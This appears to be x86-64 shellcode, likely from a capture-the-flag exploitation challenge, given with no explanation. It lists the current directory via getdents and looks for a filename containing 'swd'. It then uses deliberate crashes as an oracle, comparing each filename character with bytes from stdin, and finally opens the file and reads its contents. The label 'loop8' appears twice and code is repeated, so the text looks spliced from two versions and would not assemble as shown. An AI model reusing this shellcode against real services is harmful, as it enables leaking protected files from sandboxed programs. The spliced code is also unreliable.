    mov rsi, rsp
    xor edx, edx
    xor edi, edi
    sub edi, 100
    push 0x101
    pop rax
    syscall

    mov r15, rax
    sub rsp, 0x1000
    mov rsi, rsp

    mov rdi, rsp
    xor eax, eax
    mov rcx, 0x400
    rep stosd

    mov rdi, r15
    push 0x1000
    pop rdx
    push 0x4e
    pop rax
    syscall
    mov r13, rax
    mov r12, rsp
    xor r14, r14
    jmp loop2

loop1:
    add r12, r14
    test r13, r13
    jz crash

loop2:
    lea r15, [r12+0x10]
    xor r14, r14
    mov r14, QWORD PTR [r15]
    and r14, 0xffff
    sub r13, r14
    lea r15, [r12]
    add r15, r14
    dec r15
    mov al, BYTE PTR [r15]
    cmp al, 0x8
    jne loop1
    dec r15
    sub r15, 0x3

loop6:
    mov eax, DWORD PTR [r15]
    and eax, 0xffffff
    mov ebx, 0x647773
    cmp eax, ebx
    je loop5
    lea rax, [r12+0x12]
    cmp r15, rax
    je loop1
    dec r15
    jmp loop6

loop5:
    mov rbx, r15
    lea r15, [r12+0x12]
loop10:
    mov al, BYTE PTR [r15]
    cmp al, 0x2e
    je loop8
    cmp al, 0x30
    jl loop1
    cmp al, 0x39
    jg loop7
    jmp loop8

loop7:
    cmp al, 0x41
    jl loop1
    cmp al, 0x5a
    jg loop9
    jmp loop8

loop9:
    cmp al, 0x61
    jl loop1
    cmp al, 0x7a
    jg loop1

loop8:
    inc r15
    cmp r15, rbx
    jne loop10

    mov r15, rbx
    add r15, 0x2

    xor r9, r9
    jmp loop4

loop3:
    inc r9
    dec r15
    test eax, eax
    jz crash

loop4:
    xor eax, eax
    xor edi, edi
    mov rsi, rsp
    sub rsi, 0x100
    mov rdx, 0x2
    syscall

    mov al, BYTE PTR [r15]
    mov bl, BYTE PTR [rsi]
    cmp al, bl
    je loop3

crash:
    xor eax, eax
    sub rax, 1
    mov BYTE PTR [eax], al
    mov BYTE PTR [eax], al
    mov BYTE PTR [eax], al
    mov BYTE PTR [eax], al
    mov BYTE PTR [eax], al



loop8:
    inc r15
    cmp r15, rbx
    jne loop10

    lea rsi, [r12+0x12]
    xor edi, edi
    sub edi, 100
    xor edx, edx
    push 0x101
    pop rax
    syscall

    mov r15, rax
    mov rsi, rsp

    mov rdi, rsp
    xor eax, eax
    mov rcx, 0x400
    rep stosd

    mov rdi, r15
    mov rdx, 0x200
    xor eax, eax
    syscall

    lea r15, [rsi]
